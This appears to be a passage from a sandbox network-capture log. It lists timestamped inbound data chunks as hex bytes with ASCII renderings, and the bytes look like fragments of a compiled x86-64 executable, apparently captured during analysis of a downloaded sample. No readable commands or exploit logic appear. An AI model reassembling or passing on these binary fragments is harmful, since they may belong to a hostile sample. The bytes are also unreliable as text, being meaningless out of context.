2022-11-07 22:48:53 UTC	2112	IN	Data Raw: 10 0f 86 dd 00 00 00 48 83 ec 40 48 89 6c 24 38 48 8d 6c 24 38 48 8b 44 24 48 48 83 78 40 00 0f 84 bb 00 00 00 48 8b 88 f0 00 00 00 48 8b 90 f8 00 00 00 48 0f ba e1 3f 0f 83 97 00 00 00 48 89 cb 48 d1 e1 48 c1 e9 1f 48 be 80 7f b1 d7 0d 00 00 00 48 01 f1 48 85 c9 75 76 48 89 d9 48 81 e3 ff ff ff 3f 85 db 75 10 31 c0 88 44 24 50 48 8b 6c 24 38 48 83 c4 40 c3 48 8b 98 00 01 00 00 48 89 0c 24 48 89 54 24 08 48 89 5c 24 10 48 c7 44 24 18 00 00 00 00 e8 b2 00 e9 ff 48 8b 44 24 20 48 8b 4c 24 28 48 8b 54 24 30 48 89 04 24 48 89 4c 24 08 48 89 54 24 10 e8 b0 ea e8 ff 48 8b 44 24 48 48 8b 40 40 48 39 44 24 18 0f 9f c0 eb 9a 48 89 d9 eb a3 48 89 cb 48 89 d1 e9 75 ff ff ff 31 c0 eb 86 e8 84 81 e5 ff 0f 1f 40 00 e9 fb fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: H@Hl$8Hl$8HD$HHx@HHH?HHHHHHuvHH?u1D$PHl$8H@HH$HT$H\$HD$HD$ HL$(HT$0H$HL$HT$HD$HH@@H9D$HHHu1@
2022-11-07 22:48:54 UTC	2128	IN	Data Raw: 5c 24 08 e8 e5 e2 fd ff 80 7c 24 10 00 0f 84 99 00 00 00 48 8b 84 24 88 00 00 00 48 ff c0 48 8b 4c 24 50 48 39 c1 7f 9c 48 8d 84 24 78 01 00 00 48 89 04 24 e8 d4 c3 df ff 48 8b 84 24 78 01 00 00 48 85 c0 0f 84 1d 02 00 00 48 8b 8c 24 80 01 00 00 48 8b 10 48 89 94 24 d8 00 00 00 48 8b 59 08 48 89 5c 24 50 48 8b 40 08 48 89 44 24 78 48 8b 09 48 89 8c 24 b0 00 00 00 48 89 14 24 48 89 44 24 08 e8 65 e1 fd ff 80 7c 24 10 00 0f 84 14 01 00 00 48 8b 44 24 50 48 85 c0 7e 8b 48 8b 8c 24 b0 00 00 00 31 d2 e9 2a ff ff ff 0f 57 c0 0f 11 84 24 08 01 00 00 0f 11 84 24 18 01 00 00 48 8b 84 24 b8 00 00 00 48 89 04 24 48 8b 44 24 58 48 89 44 24 08 e8 73 6b df ff 48 8b 44 24 10 48 8d 0d e7 78 07 00 48 89 8c 24 08 01 00 00 48 89 84 24 10 01 00 00 48 8b 84 24 d8 00 00 00 48 Data Ascii: \$\|$H$HHL$PH9H$xH$H$xHH$HH$HYH\$PH@HD$xHH$H$HD$e\|$HD$PH~H$1*W$$H$H$HD$XHD$skHD$HxH$H$H$H
2022-11-07 22:48:54 UTC	2144	IN	Data Raw: 38 d0 75 03 89 79 70 44 89 4c 24 44 48 83 bc 24 c0 00 00 00 00 0f 84 64 01 00 00 31 c0 45 85 c9 0f 84 47 01 00 00 89 44 24 40 89 c7 31 c0 f0 0f b1 99 68 01 00 00 0f 94 c3 4c 8d 81 68 01 00 00 84 db 0f 84 e7 00 00 00 45 85 c9 48 89 74 24 70 4c 89 44 24 68 c6 44 24 3b 03 74 2a 41 81 f9 ff ff ff 7f 0f 87 91 02 00 00 48 8b 81 d0 00 00 00 48 89 04 24 c7 44 24 08 00 00 00 00 44 89 4c 24 0c e8 a7 01 ff ff 8b 44 24 40 0f 1f 00 85 c0 74 33 3d ff ff ff 7f 0f 87 42 02 00 00 48 8b 4c 24 58 48 8b 91 d0 00 00 00 48 8b 9c 24 98 00 00 00 8b 5b 18 48 89 14 24 89 5c 24 08 89 44 24 0c e8 69 01 ff ff 48 8b 44 24 58 48 8b 80 c0 00 00 00 48 89 04 24 e8 b4 cf fb ff b8 03 00 00 00 a8 02 75 2d a8 01 75 10 48 8b ac 24 88 00 00 00 48 81 c4 90 00 00 00 c3 83 e0 fe 88 44 24 3b 48 8b Data Ascii: 8uypDL$DH$d1EGD$@1hLhEHt$pLD$hD$;t*AHH$D$DL$D$@t3=BHL$XHH$[H$\$D$iHD$XHH$u-uH$HD$;H
2022-11-07 22:48:54 UTC	2160	IN	Data Raw: e9 ff 48 8b 44 24 20 48 89 44 24 28 48 8b 4c 24 40 48 89 0c 24 48 8b 4c 24 48 48 89 4c 24 08 48 8d 0d 7e 41 0c 00 48 89 4c 24 10 48 c7 44 24 18 01 00 00 00 e8 f4 c4 e9 ff 48 8b 44 24 28 48 39 44 24 20 0f 9c 44 24 50 48 8b 6c 24 30 48 83 c4 38 c3 e8 16 c2 e4 ff e9 51 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 f2 00 00 00 48 83 ec 28 48 89 6c 24 20 48 8d 6c 24 20 48 8b 44 24 30 48 89 04 24 48 8b 4c 24 38 48 89 4c 24 08 0f 1f 44 00 00 e8 fb fe ff ff 80 7c 24 10 00 0f 84 95 00 00 00 48 8b 54 24 38 48 83 fa 01 7c 7e 48 8d 42 ff 48 89 d3 48 29 c2 48 89 d6 48 f7 da 48 c1 fa 3f 48 21 d0 48 8b 7c 24 30 48 01 f8 66 0f 1f 44 00 00 48 83 fe 01 74 28 31 c0 84 c0 74 1d 48 8d 4b ff 48 39 Data Ascii: HD$ HD$(HL$@H$HL$HHL$H~AHL$HD$HD$(H9D$ D$PHl$0H8QeH%(HH;aH(Hl$ Hl$ HD$0H$HL$8HL$D\|$HT$8H\|~HBHH)HHH?H!H\|$0HfDHt(1tHKH9
2022-11-07 22:48:54 UTC	2176	IN	Data Raw: 8b 8c 24 38 02 00 00 0f b6 51 03 66 90 80 fa 01 0f 84 58 04 00 00 80 fa 03 0f 84 83 03 00 00 80 fa 04 0f 85 a1 02 00 00 48 8d 05 5e bb 06 00 48 89 04 24 48 c7 44 24 08 10 00 00 00 48 c7 44 24 10 10 00 00 00 e8 03 b9 e2 ff 48 8b 44 24 18 48 8b 8c 24 60 02 00 00 48 c7 41 18 10 00 00 00 48 c7 41 20 10 00 00 00 83 3d cf 89 2c 00 00 0f 85 47 02 00 00 48 89 41 10 b8 12 00 00 00 48 89 84 24 98 00 00 00 48 8b 94 24 a8 00 00 00 48 39 c2 0f 8c f9 01 00 00 0f 82 76 11 00 00 48 8b 9c 24 38 02 00 00 48 89 9c 24 40 02 00 00 48 89 94 24 a0 00 00 00 48 8d 05 92 ec 07 00 48 89 04 24 48 8b 84 24 90 02 00 00 48 89 44 24 08 48 8b 84 24 98 02 00 00 48 89 44 24 10 e8 0f ae de ff 48 8b 44 24 20 48 8b 4c 24 18 48 89 0c 24 48 89 44 24 08 48 8b 84 24 40 02 00 00 48 89 44 24 10 48 Data Ascii: $8QfXH^H$HD$HD$HD$H$`HAHA =,GHAH$H$H9vH$8H$@H$HH$H$HD$H$HD$HD$ HL$H$HD$H$@HD$H
2022-11-07 22:48:54 UTC	2192	IN	Data Raw: 24 30 48 8b 74 24 38 48 8d 58 01 48 8b 44 24 78 48 8b 4c 24 48 48 8b 54 24 60 e9 6f ff ff ff 0f 57 c0 0f 11 84 24 a0 00 00 00 0f 11 84 24 b0 00 00 00 48 8d 05 fb 0c 0c 00 48 89 04 24 48 c7 44 24 08 13 00 00 00 e8 02 6c de ff 48 8b 44 24 10 48 8d 0d 76 79 06 00 48 89 8c 24 a0 00 00 00 48 89 84 24 a8 00 00 00 48 8b 44 24 78 48 89 04 24 48 8b 44 24 48 48 89 44 24 08 e8 ce 6b de ff 48 8b 44 24 10 48 8d 0d 42 79 06 00 48 89 8c 24 b0 00 00 00 48 89 84 24 b8 00 00 00 48 8d 05 2e c6 0b 00 48 89 04 24 48 c7 44 24 08 05 00 00 00 48 8d 84 24 a0 00 00 00 48 89 44 24 10 48 c7 44 24 18 02 00 00 00 48 c7 44 24 20 02 00 00 00 e8 9a 60 ec ff 48 8b 44 24 30 48 8b 4c 24 28 48 89 8c 24 50 01 00 00 48 89 84 24 58 01 00 00 48 8b ac 24 20 01 00 00 48 81 c4 28 01 00 00 c3 48 83 Data Ascii: $0Ht$8HXHD$xHL$HHT$`oW$$HH$HD$lHD$HvyH$H$HD$xH$HD$HHD$kHD$HByH$H$H.H$HD$H$HD$HD$HD$ `HD$0HL$(H$PH$XH$ H(H
2022-11-07 22:48:54 UTC	2208	IN	Data Raw: 00 00 00 48 89 5c 24 18 ff d1 48 8b 44 24 28 48 8b 4c 24 20 48 8b 54 24 30 48 8d 1d ed 0e 11 00 48 8b 74 24 60 0f 1f 84 00 00 00 00 00 48 39 f3 0f 85 8a 00 00 00 48 8b 7c 24 68 48 85 c9 7e 05 48 39 f3 74 22 48 89 8c 24 88 00 00 00 48 89 84 24 90 00 00 00 48 89 94 24 98 00 00 00 48 8b 6c 24 50 48 83 c4 58 c3 48 89 4c 24 40 48 89 54 24 48 48 89 44 24 38 48 89 3c 24 e8 0e d0 fa ff 48 8b 44 24 08 48 8b 4c 24 10 0f 1f 40 00 48 85 c0 74 27 48 8b 54 24 38 48 85 d2 74 15 48 8b 44 24 48 48 8b 4c 24 40 48 89 c3 48 89 d0 48 89 da eb 94 48 89 c2 48 89 c8 eb e8 48 8b 54 24 38 eb dc 31 ff e9 74 ff ff ff e8 a1 01 e4 ff 90 e9 db fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d Data Ascii: H\$HD$(HL$ HT$0HHt$`H9H\|$hH~H9t"H$H$H$Hl$PHXHL$@HT$HHD$8H<$HD$HL$@Ht'HT$8HtHD$HHL$@HHHHHHT$81teH%(HH
2022-11-07 22:48:54 UTC	2224	IN	Data Raw: 08 48 89 8c 24 90 00 00 00 0f 10 40 08 0f 11 84 24 98 00 00 00 0f 10 40 18 0f 11 84 24 a8 00 00 00 0f 10 40 28 0f 11 84 24 b8 00 00 00 48 8d 84 24 90 00 00 00 48 89 04 24 e8 2f 11 00 00 90 48 8b 84 24 b8 00 00 00 48 8d 48 01 48 8b 94 24 b0 00 00 00 48 8b 9c 24 c0 00 00 00 48 39 cb 0f 82 fa 00 00 00 48 8d 48 01 48 89 8c 24 b8 00 00 00 48 8d 3c c2 83 3d c2 c9 2b 00 00 0f 85 cb 00 00 00 48 8b 8c 24 f0 00 00 00 48 89 0c c2 48 8b 84 24 e8 00 00 00 48 8b 40 18 48 8d 0d ad c1 06 00 48 89 0c 24 48 89 44 24 08 48 8b 84 24 88 00 00 00 48 89 44 24 10 e8 32 36 de ff 48 8b 44 24 18 84 00 83 3d 74 c9 2b 00 00 75 5d 48 8b 8c 24 90 00 00 00 48 89 08 0f 10 84 24 98 00 00 00 0f 11 40 08 0f 10 84 24 a8 00 00 00 0f 11 40 18 0f 10 84 24 b8 00 00 00 0f 11 40 28 c6 84 24 f8 00 Data Ascii: H$@$@$@($H$H$/H$HHH$H$H9HHH$H<=+H$HH$H@HH$HD$H$HD$26HD$=t+u]H$H$@$@$@($
2022-11-07 22:48:54 UTC	2240	IN	Data Raw: e9 2d e1 ff c7 04 24 08 00 00 00 48 8d 05 b3 88 0c 00 48 89 44 24 08 48 8b 84 24 70 05 00 00 48 89 44 24 10 e8 c4 2d e1 ff 0f 57 c0 0f 11 84 24 78 05 00 00 0f b6 84 24 c5 00 00 00 a8 01 75 10 48 8b ac 24 18 05 00 00 48 81 c4 20 05 00 00 c3 83 e0 fe 88 84 24 c7 00 00 00 48 8b 94 24 10 05 00 00 48 8b 02 ff d0 eb d7 48 8d 79 70 e8 5b 9e e3 ff e9 68 ff ff ff 48 8d 78 38 48 8b 8c 24 38 02 00 00 e8 45 9f e3 ff 0f 1f 44 00 00 e9 32 ff ff ff 48 8d 78 10 48 8b 8c 24 30 02 00 00 e8 2a 9f e3 ff e9 f8 fe ff ff 48 8d 78 68 90 e8 1b 9f e3 ff e9 44 fe ff ff 48 8d 05 6f 82 09 00 48 89 04 24 48 8b 84 24 00 02 00 00 48 89 44 24 08 48 8d 8c 24 58 03 00 00 48 89 4c 24 10 e8 6c 4b de ff 48 8b 8c 24 00 02 00 00 0f 1f 40 00 e9 ee fd ff ff 48 8b 8c 24 28 05 00 00 48 8b 99 e0 00 Data Ascii: -$HHD$H$pHD$-W$x$uH$H $H$HHyp[hHx8H$8ED2HxH$0*HxhDHoH$H$HD$H$XHL$lKH$@H$(H
2022-11-07 22:48:54 UTC	2256	IN	Data Raw: 30 48 8b 6c 24 10 48 83 c4 18 c3 48 8d 78 08 48 8b 4c 24 20 e8 b4 5f e3 ff 48 8d 78 10 48 8b 4c 24 28 e8 a6 5f e3 ff eb d3 48 c7 44 24 30 00 00 00 00 48 8b 6c 24 10 48 83 c4 18 c3 e8 2c 42 e3 ff e9 47 ff ff ff cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 1b 01 00 00 48 83 ec 40 48 89 6c 24 38 48 8d 6c 24 38 48 8b 44 24 48 48 8b 18 48 85 db 0f 84 9e 00 00 00 48 8b 4b 30 48 2b 4b 28 48 8b 74 24 58 48 39 f1 0f 8d 7e 00 00 00 48 8b 54 24 60 48 39 d1 0f 87 d2 00 00 00 48 89 1c 24 48 8b 44 24 50 48 89 44 24 08 48 89 4c 24 10 48 89 54 24 18 e8 86 fe f9 ff 48 8b 7c 24 48 48 8b 07 48 8b 4c 24 20 48 8b 54 24 28 48 8b 5c 24 30 48 8b 70 28 48 39 70 30 75 10 83 3d 4e 49 2b 00 00 75 20 48 c7 07 00 00 00 00 48 89 4c 24 68 48 89 Data Ascii: 0Hl$HHxHL$ _HxHL$(_HD$0Hl$H,BGeH%(HH;aH@Hl$8Hl$8HD$HHHHK0H+K(Ht$XH9~HT$`H9H$HD$PHD$HL$HT$H\|$HHHL$ HT$(H\$0Hp(H9p0u=NI+u HHL$hH
2022-11-07 22:48:54 UTC	2272	IN	Data Raw: 8b 54 24 70 e9 21 fe ff ff 48 8b 84 24 d8 00 00 00 48 8b 8c 24 e0 00 00 00 48 89 04 24 48 89 4c 24 08 e8 26 2c dd ff 48 8b 44 24 10 48 8d 0d da 19 10 00 48 8b 54 24 70 48 89 0a 83 3d fb 09 2b 00 00 75 06 48 89 42 08 eb b5 48 8d 7a 08 e8 7a 1e e3 ff eb aa 48 89 04 24 48 8d 05 2d 81 0a 00 48 89 44 24 08 48 c7 44 24 10 01 00 00 00 e8 5a a2 dc ff 0f b6 44 24 18 e9 70 fd ff ff 48 8b 84 24 e8 00 00 00 48 8b 8c 24 f0 00 00 00 48 89 04 24 48 89 4c 24 08 e8 b2 2b dd ff 48 8b 44 24 10 48 8d 0d 86 19 10 00 48 8b 54 24 70 48 89 0a 83 3d 87 09 2b 00 00 75 09 48 89 42 08 e9 12 fd ff ff 48 8d 7a 08 e8 03 1e e3 ff 0f 1f 00 e9 01 fd ff ff 48 89 54 24 48 48 8b 84 24 d8 00 00 00 48 89 84 24 a0 00 00 00 0f 10 84 24 e0 00 00 00 0f 11 84 24 a8 00 00 00 0f 10 84 24 f0 00 00 00 Data Ascii: T$p!H$H$H$HL$&,HD$HHT$pH=+uHBHzzH$H-HD$HD$ZD$pH$H$H$HL$+HD$HHT$pH=+uHBHzHT$HH$H$$$$
2022-11-07 22:48:54 UTC	2288	IN	Data Raw: 00 0f 85 b5 24 00 00 48 8b 84 24 80 00 00 00 48 89 07 e8 96 2a dd ff 48 8b 04 24 48 89 84 24 80 00 00 00 c6 44 24 30 04 48 8d 0d de c2 05 00 48 89 0c 24 48 89 44 24 08 48 8d 54 24 30 48 89 54 24 10 e8 a6 36 dd ff 48 8b 7c 24 18 48 c7 47 08 0b 00 00 00 83 3d e2 c9 2a 00 00 0f 85 4a 24 00 00 48 8d 05 58 5e 0a 00 48 89 07 48 8d 05 fb c2 05 00 48 89 04 24 48 8b 8c 24 88 00 00 00 48 89 4c 24 08 48 8d 15 73 58 0f 00 48 89 54 24 10 e8 59 36 dd ff 48 8b 7c 24 18 84 07 83 3d 9b c9 2a 00 00 0f 85 f1 23 00 00 48 8b 84 24 80 00 00 00 48 89 07 e8 f5 29 dd ff 48 8b 04 24 48 89 84 24 80 00 00 00 c6 44 24 2f 04 48 8d 0d 3d c2 05 00 48 89 0c 24 48 89 44 24 08 48 8d 54 24 2f 48 89 54 24 10 e8 05 36 dd ff 48 8b 7c 24 18 48 c7 47 08 0b 00 00 00 83 3d 41 c9 2a 00 00 0f 85 86 Data Ascii: $H$HH$H$D$0HH$HD$HT$0HT$6H\|$HG=J$HX^HHH$H$HL$HsXHT$Y6H\|$=#H$H)H$H$D$/H=H$HD$HT$/HT$6H\|$HG=A
2022-11-07 22:48:54 UTC	2304	IN	Data Raw: e9 70 ff ff ff 48 89 34 24 48 89 5c 24 08 48 89 4c 24 10 e8 b5 22 dc ff 0f b6 4c 24 18 48 8b 44 24 30 48 8b 54 24 38 e9 2d ff ff ff 90 e8 3b 82 e2 ff e9 d6 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d 44 24 f8 48 3b 41 10 0f 86 b6 00 00 00 48 81 ec 88 00 00 00 48 89 ac 24 80 00 00 00 48 8d ac 24 80 00 00 00 48 8b 59 20 66 0f 1f 44 00 00 48 85 db 0f 85 96 00 00 00 48 8b 84 24 90 00 00 00 48 85 c0 74 79 48 8b 08 48 89 4c 24 48 0f 10 40 08 0f 11 44 24 50 0f 10 40 18 0f 11 44 24 60 0f 10 40 28 0f 11 44 24 70 48 8b 44 24 48 48 89 04 24 0f 10 44 24 50 0f 11 44 24 08 0f 10 44 24 60 0f 11 44 24 18 0f 10 44 24 70 0f 11 44 24 28 e8 3b 16 ff ff 48 8b 44 24 38 48 8b 4c 24 40 48 89 84 Data Ascii: pH4$H\$HL$"L$HD$0HT$8-;eH%(HHD$H;AHH$H$HY fDHH$HtyHHL$H@D$P@D$`@(D$pHD$HH$D$PD$D$`D$D$pD$(;HD$8HL$@H
2022-11-07 22:48:54 UTC	2320	IN	Data Raw: 08 48 89 2c 24 48 8d 2c 24 48 8b 59 20 48 85 db 75 2c 48 83 7c 24 10 00 74 1e 48 8d 05 ed 5b 0a 00 48 89 44 24 18 48 c7 44 24 20 1f 00 00 00 48 8b 2c 24 48 83 c4 08 c3 e8 30 51 dc ff 90 48 8d 7c 24 10 48 39 3b 75 ca 48 89 23 66 90 eb c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 83 ec 08 48 89 2c 24 48 8d 2c 24 48 8b 59 20 48 85 db 75 21 48 83 7c 24 10 00 74 0e c6 44 24 18 01 48 8b 2c 24 48 83 c4 08 c3 0f 1f 44 00 00 e8 bb 50 dc ff 90 48 8d 7c 24 10 48 39 3b 75 d5 48 89 23 eb d0 cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 83 ec 08 48 89 2c 24 48 8d 2c 24 48 8b 59 20 48 85 db 75 21 48 83 7c 24 10 00 74 0e c6 44 24 18 01 Data Ascii: H,$H,$HY Hu,H\|$tH[HD$HD$ H,$H0QH\|$H9;uH#feH%(HHH,$H,$HY Hu!H\|$tD$H,$HDPH\|$H9;uH#eH%(HHH,$H,$HY Hu!H\|$tD$
2022-11-07 22:48:54 UTC	2336	IN	Data Raw: 48 8b 44 24 60 48 8b 4c 24 40 48 8b 54 24 38 48 89 74 24 28 48 39 d3 7c a9 48 8b 4c 24 58 48 8b 49 60 48 8d 15 e4 fc 04 00 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 e8 91 a9 dc ff 48 8b 44 24 18 48 8b 4c 24 28 48 89 08 48 89 4c 24 70 48 8b 6c 24 48 48 83 c4 50 c3 48 8b 44 24 58 48 8b 48 60 48 8d 15 a5 fc 04 00 48 89 14 24 48 89 4c 24 08 48 8b 4c 24 60 48 89 4c 24 10 e8 0d a4 dc ff 48 8b 44 24 18 48 8b 00 80 7c 24 20 00 0f 84 0f ff ff ff 48 89 44 24 70 48 8b 6c 24 48 48 83 c4 50 c3 e8 c6 01 e2 ff e9 c1 fe ff ff cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 16 04 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 8b 54 24 58 0f b6 1a 80 fb 04 75 1f 48 8b 72 28 48 83 7a 30 02 66 90 0f 85 73 03 00 00 8b 3e 39 7e 04 0f 84 fc 02 00 00 80 Data Ascii: HD$`HL$@HT$8Ht$(H9\|HL$XHI`HH$HL$HD$HD$HL$(HHL$pHl$HHPHD$XHH`HH$HL$HL$`HL$HD$H\|$ HD$pHl$HHPeH%(HH;aHHHl$@Hl$@HT$XuHr(Hz0fs>9~
2022-11-07 22:48:54 UTC	2352	IN	Data Raw: 00 66 41 f7 c0 08 00 74 49 48 89 04 24 c6 44 24 08 06 e8 b6 c9 ff ff 4c 8b 84 24 a0 00 00 00 49 8d 48 ff 49 89 c8 48 f7 d9 48 c1 f9 3f 48 83 e1 01 4c 8b 8c 24 50 01 00 00 49 8d 04 09 4c 89 c1 0f b6 54 24 77 31 db 31 f6 0f 1f 40 00 e9 25 fd ff ff 48 89 04 24 c6 44 24 08 05 e8 6d c9 ff ff eb b5 41 80 fa 2a 0f 85 c1 00 00 00 bf 0e 00 00 00 40 88 7c 24 77 48 89 04 24 40 88 7c 24 08 0f 57 c0 0f 11 44 24 10 48 89 54 24 20 48 89 4c 24 28 48 8d 59 ff 48 89 de 48 f7 db 48 c1 fb 3f 48 83 e3 01 48 01 d3 48 89 5c 24 30 48 89 74 24 38 4c 89 4c 24 40 4c 89 44 24 48 e8 0e ca ff ff 48 8b 44 24 60 48 8b 4c 24 50 48 8b 54 24 58 48 8b 5c 24 68 48 89 84 24 90 01 00 00 48 89 9c 24 98 01 00 00 48 85 c0 75 20 48 89 c8 48 8b 9c 24 a0 00 00 00 48 8b b4 24 50 01 00 00 48 89 d1 0f Data Ascii: fAtIH$D$L$IHIHH?HL$PILT$w11@%H$D$mA*@\|$wH$@\|$WD$HT$ HL$(HYHHH?HHH\$0Ht$8LL$@LD$HHD$`HL$PHT$XH\$hH$H$Hu HH$H$PH
2022-11-07 22:48:54 UTC	2368	IN	Data Raw: 00 00 48 85 d2 0f 85 c9 05 00 00 48 89 94 24 80 00 00 00 48 89 84 24 a8 00 00 00 74 21 80 38 2d 75 1c 45 0f b7 30 0f 1f 80 00 00 00 00 66 41 f7 c6 40 00 75 09 45 84 ed 0f 84 af 04 00 00 4c 89 9c 24 88 00 00 00 4c 89 a4 24 90 00 00 00 4c 89 94 24 c0 00 00 00 48 83 fa 02 7e 0f 80 38 5b 75 0a 80 78 01 3a 0f 84 ca 03 00 00 4c 89 04 24 48 89 44 24 08 48 89 54 24 10 4c 89 54 24 18 4c 89 5c 24 20 4c 89 64 24 28 0f 1f 44 00 00 e8 7b f4 ff ff 48 8b 44 24 30 48 8b 4c 24 58 48 8b 54 24 38 48 8b 5c 24 40 48 8b 74 24 48 48 8b 7c 24 50 4c 8b 44 24 60 48 85 c9 0f 85 4c 03 00 00 48 85 c0 0f 85 f9 fe ff ff 48 8b 84 24 e0 00 00 00 48 89 04 24 48 8b 8c 24 a8 00 00 00 48 89 4c 24 08 48 8b 94 24 80 00 00 00 48 89 54 24 10 48 8b 9c 24 c0 00 00 00 48 89 5c 24 18 48 8b b4 24 88 Data Ascii: HH$H$t!8-uE0fA@uEL$L$L$H~8[ux:L$HD$HT$LT$L\$ Ld$(D{HD$0HL$XHT$8H\$@Ht$HH\|$PLD$`HLHH$H$H$HL$H$HT$H$H\$H$
2022-11-07 22:48:54 UTC	2384	IN	Data Raw: 8b 47 10 48 8d 48 10 48 8b 57 18 48 8b 5f 08 48 39 ca 72 52 48 be 5e 5c 78 30 30 2d 5c 78 48 89 34 03 48 be 7b 31 30 46 46 46 46 7d 48 89 74 03 08 48 89 4f 10 48 89 57 18 83 3d fd 49 29 00 00 75 10 48 89 5f 08 48 89 fa 0f 1f 40 00 e9 66 fe ff ff 48 8d 47 08 48 89 f9 48 89 c7 e8 ac 5f e1 ff 48 89 cf eb e0 48 89 84 24 b0 00 00 00 48 89 8c 24 a8 00 00 00 48 8d 35 10 7b 03 00 48 89 34 24 48 89 5c 24 08 48 89 44 24 10 48 89 54 24 18 48 89 4c 24 20 e8 b3 79 df ff 48 8b 5c 24 28 48 8b 54 24 38 48 8b 84 24 b0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b bc 24 48 01 00 00 e9 53 ff ff ff 83 3d 75 49 29 00 00 75 08 48 89 3f e9 2d ff ff ff 48 89 f8 e8 f3 5d e1 ff e9 20 ff ff ff 80 fb 01 0f 85 22 01 00 00 90 90 48 8b bc 24 48 01 00 00 48 8b 07 48 85 c0 0f 84 ee 00 00 00 48 Data Ascii: GHHHWH_H9rRH^\x00-\xH4H{10FFFF}HtHOHW=I)uH_H@fHGHH_HH$H$H5{H4$H\$HD$HT$HL$ yH\$(HT$8H$H$H$HS=uI)uH?-H] "H$HHHH
2022-11-07 22:48:54 UTC	2400	IN	Data Raw: 01 00 00 00 48 8b 4c 24 30 48 89 48 10 48 8b 4c 24 28 48 89 48 18 83 3d 20 0a 29 00 00 0f 85 6f 14 00 00 48 8b 8c 24 38 01 00 00 48 89 48 08 48 8b 05 07 31 25 00 48 89 84 24 30 01 00 00 48 8b 0d 00 31 25 00 48 89 4c 24 30 48 8b 15 fc 30 25 00 48 89 54 24 28 48 8d 1d 10 0c 04 00 48 89 1c 24 48 8b b4 24 50 01 00 00 48 89 74 24 08 48 8d 3d cf 81 08 00 48 89 7c 24 10 48 c7 44 24 18 02 00 00 00 e8 c5 be db ff 48 8b 44 24 20 48 c7 00 ff ff ff ff 48 8b 4c 24 30 48 89 48 10 48 8b 4c 24 28 48 89 48 18 83 3d 90 09 29 00 00 0f 85 c4 13 00 00 48 8b 8c 24 30 01 00 00 48 89 48 08 48 8b 05 97 30 25 00 48 89 84 24 28 01 00 00 48 8b 0d 90 30 25 00 48 89 4c 24 30 48 8b 15 8c 30 25 00 48 89 54 24 28 48 8d 1d 80 0b 04 00 48 89 1c 24 48 8b b4 24 50 01 00 00 48 89 74 24 08 48 Data Ascii: HL$0HHHL$(HH= )oH$8HHH1%H$0H1%HL$0H0%HT$(HH$H$PHt$H=H\|$HD$HD$ HHL$0HHHL$(HH=)H$0HHH0%H$(H0%HL$0H0%HT$(HH$H$PHt$H
2022-11-07 22:48:54 UTC	2416	IN	Data Raw: 24 89 74 24 08 e8 a3 60 ff ff 48 83 7c 24 10 ff 0f 95 c0 48 8b 94 24 a0 00 00 00 0f b6 5c 24 57 8b b4 24 c8 00 00 00 4c 8b 84 24 a8 00 00 00 4c 8b 4c 24 70 4c 8b 54 24 68 4c 8b 5c 24 78 4c 8b ac 24 b8 00 00 00 e9 08 fc ff ff 66 90 41 80 fc 08 75 21 49 8b 4b 18 4d 8b 63 10 48 85 c9 76 5e 41 39 34 24 0f 94 c0 4c 8b ac 24 b8 00 00 00 e9 df fb ff ff 41 80 fc 09 75 13 4c 8b ac 24 b8 00 00 00 b8 01 00 00 00 e9 c7 fb ff ff 90 41 80 fc 0a 75 4e 83 fe 0a 0f 95 c0 4c 8b ac 24 b8 00 00 00 e9 ad fb ff ff 49 c7 40 20 00 00 00 00 48 8b ac 24 90 00 00 00 48 81 c4 98 00 00 00 c3 31 c0 e8 a8 e2 e0 ff e8 63 e3 e0 ff b8 01 00 00 00 e8 99 e2 e0 ff b8 01 00 00 00 4c 89 e9 e8 8c e2 e0 ff 48 8d 05 e5 f8 02 00 48 89 04 24 48 8d 05 ca 86 0d 00 48 89 44 24 08 e8 70 b7 dd ff 31 c0 Data Ascii: $t$`H\|$H$\$W$L$LL$pLT$hL\$xL$fAu!IKMcHv^A94$L$AuL$AuNL$I@ H$H1cLHH$HHD$p1
2022-11-07 22:48:54 UTC	2432	IN	Data Raw: 28 00 00 0f 85 29 01 00 00 0f 57 c0 0f 11 07 90 48 83 bf a8 00 00 00 00 0f 84 85 00 00 00 0f 57 c0 0f 11 87 b0 00 00 00 83 3d 0e 8a 28 00 00 75 59 48 c7 87 a8 00 00 00 00 00 00 00 48 8b 54 24 28 48 8b 42 78 0f 1f 84 00 00 00 00 00 48 83 f8 05 0f 83 fb 00 00 00 48 8d 04 80 48 8d 0d 2b 5e 25 00 48 8d 04 c1 48 89 04 24 48 8d 05 1c 2d 05 00 48 89 44 24 08 48 89 7c 24 10 e8 4d 59 e1 ff 48 8b 6c 24 18 48 83 c4 20 c3 48 8d 97 a8 00 00 00 48 89 f8 48 89 d7 31 db e8 6f 9f e0 ff 48 89 c7 eb 99 48 83 bf d0 00 00 00 00 66 90 74 43 48 c7 87 d0 00 00 00 00 00 00 00 83 3d 7c 89 28 00 00 75 10 48 c7 87 d8 00 00 00 00 00 00 00 e9 69 ff ff ff 48 8d 97 d8 00 00 00 48 89 f8 48 89 d7 31 db e8 26 9f e0 ff 48 89 c7 0f 1f 00 e9 4a ff ff ff 48 c7 87 c8 00 00 00 00 00 00 00 83 3d Data Ascii: ()WHW=(uYHHT$(HBxHHH+^%HH$H-HD$H\|$MYHl$H HHH1oHHftCH=\|(uHiHHH1&HJH=
